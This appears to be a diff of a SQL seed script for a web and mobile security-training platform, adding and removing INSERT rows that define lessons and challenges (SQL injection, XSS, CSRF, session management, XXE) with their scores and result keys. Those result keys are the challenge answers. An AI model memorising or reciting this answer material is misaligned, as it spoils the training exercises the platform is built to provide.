- 'Mobile Broken Crypto', 'mobile.broken.crypto', 'DancingRobotChilliSauce',
- 'fb5c9ce0f5539b737e534fd317befff7427f6610ed626dfd43abf35295f106bc', 'open', '149', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('e635fce334aa61fdaa459c21c286d6332eddcdd3', 'Client Side Injection 2', 'client.side.injection.2', 'challenge',
- 'Mobile Injection', 'mobile.injection', 'BurpingChimneys',
- 'cfe68711def42bb0b201467b859322dd2750f633246842280dc68c858d208425', 'open', '155', '80', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('0a37cb9296ff3763f7f3a45ff313bce47afa9384', 'CSRF 5', 'csrf.5', 'challenge', 'CSRF', 'csrf',
- '8f34078ef3e53f619618d9def1ede8a6a9117c77c2fad22f76bba633da83e6d4',
- '70b96195472adf3bf347cbc37c34489287969d5ba504ac2439915184d6e5dc49', 'open', '156', '80', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3b14ca3c8f9b90c9b2c8cd1fba9fa67add1272a3', 'Poor Data Validation 2', 'poor.data.validation.2', 'challenge',
- 'Poor Data Validation', 'poor.data.validation',
- '05adf1e4afeb5550faf7edbec99170b40e79168ecb3a5da19943f05a3fe08c8e',
- '20e8c4bb50180fed9c1c8d1bf6af5eac154e97d3ce97e43257c76e73e3bbe5d5', 'open', '157', '80', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ba6e65e4881c8499b5e53eb33b5be6b5d0f1fb2c', 'Poor Authentication 1', 'poor.authentication.1', 'challenge',
- 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MegaKillerExtremeCheese',
- 'efa08298fc6a4add4b9a4bbdbbbb18ac934667971fa275bd7d234589bd8a8467', 'open', '160', '60', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('c7ac1e05faa2d4b1016cfcc726e0689419662784', 'Failure to Restrict URL Access 2',
- 'failure.to.restrict.url.access.2', 'challenge', 'Failure to Restrict URL Access',
- 'failure.to.restrict.url.access', '40b675e3d404c52b36abe31d05842b283975ec62e8',
- '278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa', 'open', '165', '85', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('fccf8e4d5372ee5a73af5f862dc810545d19b176', 'Cross Site Scripting 5', 'cross.site.scripting.5', 'challenge',
- 'XSS', 'xss', '7d7cc278c30cca985ab027e9f9e09e2f759e5a3d1f63293',
- 'f37d45f597832cdc6e91358dca3f53039d4489c94df2ee280d6203b389dd5671', 'open', '166', '85', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('064e28ea4b2f7708b8cb4495d9db1a5e05decdb8', 'Poor Authentication 2', 'poor.authentication.2', 'challenge',
- 'Mobile Poor Authentication', 'mobile.poor.authentication', 'MoreRobotsNotEnoughNuts',
- '808d8372ec7bc7e37e8e3b30d313cb47763926065a4623b27b24cc537fee72a7', 'open', '173', '70', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('a84bbf8737a9ca749d81d5226fc87e0c828138ee', 'SQL Injection 5', 'sql.injection.5', 'challenge', 'Injection',
- 'injection', '343f2e424d5d7a2eff7f9ee5a5a72fd97d5a19ef7bff3ef2953e033ea32dd7ee',
- '8edf0a8ed891e6fef1b650935a6c46b03379a0eebab36afcd1d9076f65d4ce62', 'open', '175', '90', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('04a5bd8656fdeceac26e21ef6b04b90eaafbd7d5', 'CSRF 6', 'csrf.6', 'challenge', 'CSRF', 'csrf',
- 'df611f54325786d42e6deae8bbd0b9d21cf2c9282ec6de4e04166abe2792ac00',
- '2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569', 'open', '176', '90', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('dc89383763c68cba0aaa1c6f3fd4c17e9d49a805', 'SQL Injection Stored Procedure', 'sql.injection.stored.procedure',
- 'challenge', 'Injection', 'injection', 'd9c5757c1c086d02d491cbe46a941ecde5a65d523de36ac1bfed8dd4dd9994c8',
- '7edcbc1418f11347167dabb69fcb54137960405da2f7a90a0684f86c4d45a2e7', 'open', '177', '90', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6a411618a05e3cef8ccb6f3d7914412d27782a88', 'Content Provider Leakage 1', 'content.provider.leakage.1',
- 'challenge', 'Mobile Content Provider', 'mobile.content.provider', 'BlueCupNoPartySorry',
- '2a845ec1943a6342956a48cdc8ca60f40036b68a810109d0b9d2a35271377980', 'open', '178', '75', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('3b1af0ad239325bf494c6e606585320b31612e72', 'Broken Crypto 3', 'broken.crypto.3', 'challenge',
- 'Mobile Broken Crypto', 'mobile.broken.crypto', 'ShaveTheSkies',
- 'f5a3f19dd44b53c6d29dda65fa90791bb312a3044b3110acb8a65d165376bf34', 'open', '180', '180', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed', 'Cross Site Scripting 6', 'cross.site.scripting.6', 'challenge',
- 'XSS', 'xss', 'c13e42171dbd41a7020852ffdd3399b63a87f5',
- 'd330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf', 'open', '185', '95', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe', 'SQL Injection 6', 'sql.injection.6', 'challenge', 'Injection',
- 'injection', '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82',
- 'd0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2', 'open', '186', '95', 1, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('ed732e695b85baca21d80966306a9ab5ec37477f', 'Session Management Challenge 5', 'session.management.challenge.5',
- 'challenge', 'Session Management', 'session.management', 'a15b8ea0b8a3374a1dedc326dfbe3dbae26',
- '7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1', 'open', '205', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('adc845f9624716eefabcc90d172bab4096fa2ac4', 'Failure to Restrict URL Access 3',
- 'failure.to.restrict.url.access.3', 'challenge', 'Failure to Restrict URL Access',
- 'failure.to.restrict.url.access', '8c1dbfdc7cad35a116535f76f21e448c6c7c0ebc395be2be80e5690e01adec18',
- 'e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4', 'open', '206', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('9294ba32bdbd680e3260a0315cd98bf6ce8b69bd', 'Session Management Challenge 6', 'session.management.challenge.6',
- 'challenge', 'Session Management', 'session.management',
- 'bb0eb566322d6b1f1dff388f5eee9929f6f1f9f5cac9eed266ef6e5053fe08e6',
- 'b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece', 'open', '207', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('6158a695f20f9286d5f12ff3f4d42678f4a9740c', 'Security Misconfig Cookie Flag', 'security.misconfig.cookie.flag',
- 'challenge', 'Security Misconfigurations', 'security.misconfigurations',
- '92755de2ebb012e689caf8bfec629b1e237d23438427499b6bf0d7933f1b8215',
- 'c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4', 'open', '208', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('368491877a0318e9a774ba5d648c33cb0165ba1e', 'Session Management Challenge 7', 'session.management.challenge.7',
- 'challenge', 'Session Management', 'session.management',
- '9042eeaa8455f71deea31a5a32ae51e71477b1581c3612972902206ac51bb621',
- '269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80', 'open', '209', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('64070f5aec0593962a29a141110b9239d73cd7b3', 'SQL Injection 7', 'sql.injection.7', 'challenge', 'Injection',
- 'injection', '4637cae3d9b961fdff880d6d5ce4f69e91fe23db0aae7dcd4038e20ed8a287dc',
- '8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced', 'open', '210', '110', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('145111e80400e4fd48bd3aa5aca382e9c5640793', 'Insecure Cryptographic Storage Challenge 4',
- 'insecure.cryptographic.storage.challenge.4', 'challenge', 'Insecure Cryptographic Storage',
- 'insecure.cryptographic.storage', '50980917266ce6ec07471f49b1a046ca6a5034eb9261fb44c3ffc4b16931191c',
- 'b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9', 'open', '211', '115', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('7153290d128cfdef5f40742dbaeb129a36ac2340', 'Session Management Challenge 8', 'session.management.challenge.8',
- 'challenge', 'Session Management', 'session.management',
- '11d84b0ad628bb6e99e0640ff1791a29a1938609829ef5bdccee92b2bccd2bcd',
- '714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334', 'open', '215', '115', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5', 'CSRF 7', 'csrf.7', 'challenge', 'CSRF', 'csrf',
- '849e1efbb0c1e870d17d32a3e1b18a8836514619146521fbec6623fce67b73e8',
- '7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3', 'open', '235', '120', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key',
- 'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage',
- 'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D',
- '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0, 0);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('df2ac757cc135dcb8ce5ea01f677c74f04b446d6', 'XXE Injection', 'xxe.lessons', 'lesson', 'Injection', 'injection',
- 'c8c232cd8e3abdfea3fcef24379415a65e00ac197af09e82602e231aa3031879',
- '57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a', 'closed', '55', '30', 1, 1);
-INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`,
- `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`,
- `scoreValue`, `hardcodedKey`, `isUnsafe`)
-VALUES ('08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', 'XXE Injection 1', 'xxe.injection.1', 'challenge', 'Injection',
- 'injection', '1016d6dce9f715e9eab4f3a884b3b316cfbba8fb4023c19f34c62bd936d5695b',
- 'ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e', 'closed', '89', '45', 1, 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('0dbea4cb5811fff0527184f99bd5034ca9286f11', 'Insecure Direct Object References', 'insecure.direct.object.references', 'lesson', 'Insecure Direct Object References', 'insecure.direct.object.references', '59e571b1e59441e76e0c85e5b49', 'fdb94122d0f032821019c7edf09dc62ea21e25ca619ed9107bcc50e4a8dbc100', 'open', '5', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('b9d82aa7b46ddaddb6acfe470452a8362136a31e', 'Poor Data Validation', 'poor.data.validation', 'lesson', 'Poor Data Validation', 'poor.data.validation', '6680b08b175c9f3d521764b41349fcbd3c0ad0a76655a10d42372ebccdfdb4bb', '4d8d50a458ca5f1f7e2506dd5557ae1f7da21282795d0ed86c55fefe41eb874f', 'open', '6', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('bf847c4a8153d487d6ec36f4fca9b77749597c64', 'Security Misconfiguration', 'security.misconfiguration', 'lesson', 'Security Misconfigurations', 'security.misconfigurations', '55b34717d014a5a355f6eced4386878fab0b2793e1d1dbfd23e6262cd510ea96', 'fe04648f43cdf2d523ecf1675f1ade2cde04a7a2e9a7f1a80dbb6dc9f717c833', 'open', '7', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('9533e21e285621a676bec58fc089065dec1f59f5', 'Broken Session Management', 'broken.session.management', 'lesson', 'Session Management', 'session.management', '6594dec9ff7c4e60d9f8945ca0d4', 'b8c19efd1a7cc64301f239f9b9a7a32410a0808138bbefc98986030f9ea83806', 'open', '16', '10', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'lesson', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'f60d1337ac4d35cb67880a3adda79', 'oed23498d53ad1d965a589e257d8366d74eb52ef955e103c813b592dba0477e3', 'open', '25', '15', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', 'Cross Site Scripting', 'cross.site.scripting', 'lesson', 'XSS', 'xss', 'ea7b563b2935d8587539d747d', 'zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a', 'open', '26', '15', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('cd7f70faed73d2457219b951e714ebe5775515d8', 'Cross Site Scripting 1', 'cross.site.scripting.1', 'challenge', 'XSS', 'xss', '445d0db4a8fc5d4acb164d022b', 'd72ca2694422af2e6b3c5d90e4c11e7b4575a7bc12ee6d0a384ac2469449e8fa', 'open', '35', '20', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('53a53a66cb3bf3e4c665c442425ca90e29536edd', 'Insecure Data Storage', 'insecure.data.storage', 'lesson', 'Mobile Insecure Data Storage', 'mobile.insecure.data.storage', 'Battery777', 'ecfad0a5d41f59e6bed7325f56576e1dc140393185afca8975fbd6822ebf392f', 'open', '45', '25', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('201ae6f8c55ba3f3b5881806387fbf34b15c30c2', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'lesson', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'base64isNotEncryptionBase64isEncodingBase64HidesNothingFromYou', 'if38ebb58ea2d245fa792709370c00ca655fded295c90ef36f3a6c5146c29ef2', 'open', '46', '25', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('408610f220b4f71f7261207a17055acbffb8a747', 'SQL Injection', 'sql.injection', 'lesson', 'Injection', 'injection', '3c17f6bf34080979e0cebda5672e989c07ceec9fa4ee7b7c17c9e3ce26bc63e0', 'e881086d4d8eb2604d8093d93ae60986af8119c4f643894775433dbfb6faa594', 'open', '55', '30', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('891a0208a95f1791287be721a4b851d4c584880a', 'Insecure Cryptographic Storage Challenge 1', 'insecure.cryptographic.storage.challenge.1', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', 'mylovelyhorserunningthroughthefieldwhereareyougoingwithyourbiga', 'x9c408d23e75ec92495e0caf9a544edb2ee8f624249f3e920663edb733f15cd7', 'open', '65', '35', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', 'Insecure Direct Object Reference Challenge 1', 'insecure.direct.object.reference.challenge.1', 'challenge', 'Insecure Direct Object References', 'insecure.direct.object.references', 'dd6301b38b5ad9c54b85d07c087aebec89df8b8c769d4da084a55663e6186742', 'o9a450a64cc2a196f55878e2bd9a27a72daea0f17017253f87e7ebd98c71c98c', 'open', '66', '35', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6be5de81223cc1b38b6e427cc44f8b6a28d2bc96', 'Poor Data Validation 1', 'poor.data.validation.1', 'challenge', 'Poor Data Validation', 'poor.data.validation', 'd30475881612685092e5ec469317dcc5ccc1f548a97bfdb041236b5bba7627bf', 'ca0e89caf3c50dbf9239a0b3c6f6c17869b2a1e2edc3aa6f029fd30925d66c7e', 'open', '67', '35', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('544aa22d3dd16a8232b093848a6523b0712b23da', 'SQL Injection 1', 'sql.injection.1', 'challenge', 'Injection', 'injection', 'fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f', 'e1e109444bf5d7ae3d67b816538613e64f7d0f51c432a164efc8418513711b0a', 'open', '68', '35', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('2ab09c0c18470ae5f87d219d019a1f603e66f944', 'Reverse Engineering', 'reverse.engineering', 'lesson', 'Mobile Reverse Engineering', 'mobile.reverse.engineering', 'DrumaDrumaDrumBoomBoom', '19753b944b63232812b7af1a0e0adb59928158da5994a39f584cb799f25a95b9', 'open', '75', '40', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', 'Session Management Challenge 1', 'session.management.challenge.1', 'challenge', 'Session Management', 'session.management', 'db7b1da5d7a43c7100a6f01bb0c', 'dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a', 'open', '75', '40', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('3d5b46abc6865ba09aaff98a8278a5f5e339abff', 'Failure to Restrict URL Access 1', 'failure.to.restrict.url.access.1', 'challenge', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', 'c776572b6a9d5b5c6e4aa672a4771213', '4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99', 'open', '76', '40', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('1506f22cd73d14d8a73e0ee32006f35d4f234799', 'Unintended Data Leakage', 'unintended.data.leakage', 'lesson', 'Mobile Data Leakage', 'mobile.data.leakage', 'SilentButSteadyRedLed', '392c20397c535845d93c32fd99b94f70afe9cca3f78c1e4766fee1cc08c035ec', 'open', '77', '40', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('453d22238401e0bf6f1ff5d45996407e98e45b07', 'Cross Site Request Forgery', 'cross.site.request.forgery', 'lesson', 'CSRF', 'csrf', '666980771c29857b8a84c686751ce7edaae3d6ac1', 'ed4182af119d97728b2afca6da7cdbe270a9e9dd714065f0f775cd40dc296bc7', 'open', '78', '40', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('5b461ebe2e5e2797740cb3e9c7e3f93449a93e3a', 'Content Provider Leakage', 'content.provider.leakage', 'lesson', 'Mobile Content Provider', 'mobile.content.provider', 'LazerLizardsFlamingWizards', '4d41997b5b81c88f7eb761c1975481c4ce397b80291d99307cfad69662277d39', 'open', '79', '50', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6f5db377c28da4179bca1a43ede8d6bcf7bd322e', 'Untrusted Input', 'untrusted.input', 'lesson', 'Mobile Security Decisions via Untrusted Input', 'mobile.security.decisions.via.untrusted.input', 'RetroMagicFuturePunch', '5e2b61c679d1f290d23308b3b66c3ec00cd069f1483b705d17f2795a4e77dcb6', 'open', '82', '50', 1, 0);
